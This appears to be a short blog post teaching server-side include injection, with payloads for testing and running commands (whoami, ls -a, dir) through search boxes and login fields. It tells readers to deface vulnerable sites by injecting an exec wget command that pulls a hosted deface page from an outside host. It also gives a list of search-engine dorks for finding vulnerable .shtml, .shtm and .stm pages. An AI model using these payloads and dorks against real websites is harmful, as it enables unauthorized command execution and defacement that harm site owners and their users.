Skip to main content

SERVER-SIDE INCLUDES (SSI) INJECTION

SERVER-SIDE INCLUDES (SSI) INJECTION | Juno_okyo's Blog

It is a web attack were a remote attacker can execute commands on the server remotely, SSI Injections are used to execute some content before the web page is loaded or before the web page displayed to the user. SSI are exploited by injection mailicious codes in HTML web pages.

SSI Injection is a bit similiar to XSS attacks, we check the website, if its vulnerable or not by executing codes/commands in the search boxs, headers, cookies like we do in the case of XSS.


To check the website, if its vulnerable to SSI Injection, search for files and web pages like ".shtml", ".stm", ".shtm" then enter 
 <!--#echo var="DATE_LOCAL" --> in the search box or in the user/password field, After executing the command, if you see date and time, you can say the website is vulnerable to SSI Injection.

If you want to check the running user on the server use this 
 <!--#exec cmd="whoami"-->This will give the user name and details which is running on the server.
If you want to get the list of current directories use <pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 
It works only for Linux servers, for Windows servers use <!-- #exec cmd="dir" -->

You can add you deface page too on the vulnerbale website, firstly upload your deface on a hosting website, best for hosting HTML pages is http://www.pastehtml.com 
Now, enter the following codes <!--#exec cmd="wget http://website.com/deface.html" -->in the search box of the website, or in the Username and Password area, after the execution of the codes you can view your deface page here  http://website.com/deface.html

Dorks for Finding SSI Vulnerable Websites

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=

Share this with your friends
Loading...